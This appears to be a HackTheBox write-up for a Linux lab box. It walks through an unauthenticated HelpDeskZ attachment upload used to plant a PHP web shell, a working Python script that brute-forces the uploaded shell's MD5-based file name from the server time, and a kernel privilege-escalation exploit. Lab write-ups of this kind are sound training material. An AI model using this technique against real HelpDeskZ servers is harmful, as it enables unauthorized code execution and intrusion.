HackTheBox Difficulty Rating: 43%
OS: Linux
Points: 20
Release date: 19 Jan 2018

This box was fairly straightforward. The user part revolves around an unauthenticated file upload found when submitting a ticket on the web application. The tricky part is getting the Python script found on searchsploit to actually locate the uploaded file. For root, there is a kernel exploit, also found on searchsploit. Let's get to it.

User

I start off with an nmap scan; I usually run -sCV -O. The output shows that ports 22, 80 and 3000 are open.

Port 80 serves the standard Ubuntu default page, so I let DirBuster enumerate it while I play around with the Node.js application on port 3000.

After a few minutes of unsuccessful testing there, I come back to DirBuster and see that http://10.10.10.121/support/ leads to a HelpDeskZ page. A few other interesting pages pop up, including http://10.10.10.121/support/?v=staff, but the first thing that catches my eye is the attachment upload on the Submit a Ticket tab.

A quick search for “helpdeskz exploit” turns up a small Python script that tries to locate the uploaded file on the server. I upload a PHP web shell and, lo and behold... the script can't find anything.

After tweaking the script a little using the HelpDeskZ source code on GitHub (https://github.com/evolutionscript/HelpDeskZ-1.0), I managed to make it work as intended.

Two things had to be accounted for. First, uploads land in the /uploads/tickets/ folder. Second, the stored file name is the MD5 hash of the original file name concatenated with the upload time, so the script has to search around the server's clock rather than mine: I was nowhere near the server's timezone, and its clock was also running 5-6 minutes late for some reason. To fix this, I took the actual upload time from the response in Burp Suite and hardcoded it into the Python script, as can be seen in the images below:

I also widened the search range from 300 to 500 seconds, just to make sure I would hit the correct hash.
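To make the naming scheme concrete, here is an added Python 3 example that is not the author's modified script and not the searchsploit one. It implements the same search: the stored name is md5(original file name + server upload time) plus the extension under /uploads/tickets/, and instead of trusting the attacker's clock it takes the server time from the Date header of the upload response (the value you would read in Burp) and walks back through a window of candidate timestamps. The HelpDeskZ URL, the uploaded file name and the Date header value in the usage section are constructed for illustration; the probe is passed in as a callable so it can be swapped for a real HTTP HEAD request or a fake one for testing.

```python
import hashlib
import urllib.error
import urllib.request
from email.utils import parsedate_to_datetime
from typing import Callable, Optional

# Upload directory relative to the HelpDeskZ root (from the HelpDeskZ source).
UPLOAD_DIR = "/uploads/tickets/"


def uploaded_name(original_name: str, epoch: int, ext: str = "php") -> str:
    """Name HelpDeskZ gives a stored attachment: md5(original name + upload time) + extension.

    Python 3's hashlib needs bytes here; the old Python 2 script hashes a str,
    which is one reason it breaks when run unmodified under Python 3.
    """
    digest = hashlib.md5((original_name + str(epoch)).encode()).hexdigest()
    return f"{digest}.{ext}"


def server_epoch_from_date_header(date_header: str) -> int:
    """Convert the 'Date' header of the upload response (as shown in Burp) into the
    server's own epoch time, skew included, which is what time() returned server-side."""
    return int(parsedate_to_datetime(date_header).timestamp())


def find_upload(helpdeskz_url: str, original_name: str, server_epoch: int,
                probe: Callable[[str], bool], window: int = 500,
                ahead: int = 5, ext: str = "php") -> Optional[str]:
    """Walk back `window` seconds from the server's upload time (plus a small margin
    ahead of it) and return the first candidate URL that `probe` reports as present."""
    base = helpdeskz_url.rstrip("/") + UPLOAD_DIR
    for epoch in range(server_epoch + ahead, server_epoch - window, -1):
        url = base + uploaded_name(original_name, epoch, ext)
        if probe(url):
            return url
    return None


def http_head_probe(url: str) -> bool:
    """Probe a candidate URL with a HEAD request; a 200 means the file is there."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status == 200
    except (urllib.error.HTTPError, urllib.error.URLError):
        return False


if __name__ == "__main__":
    # Constructed values (not from the original post): the HelpDeskZ root on the
    # box, the name of the uploaded shell and the Date header of the upload response.
    epoch = server_epoch_from_date_header("Sat, 20 Jan 2018 10:00:00 GMT")
    hit = find_upload("http://10.10.10.121/support", "shell.php", epoch, http_head_probe)
    print(hit or "Sorry, I did not find anything")
```

Reading the server time out of the response header sidesteps both the timezone confusion and the server clock running several minutes slow, and the window only has to cover the gap between the upload and the moment you run the search.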

After that I connected to the web shell, and the first part was done.

Root

During enumeration a few things popped up immediately: a .bash_history file containing a password-looking string, and a few files in the user's /home directory. But a quick internet search for the kernel version turned up an exploit specifically for Linux 4.4.0-116-generic.

From here it was a straight shot: copy the exploit -> compile -> execute -> profit. (Kernel exploits can take the box down if the version does not match exactly, so it is worth confirming the full uname output against the exploit's target before running it.)
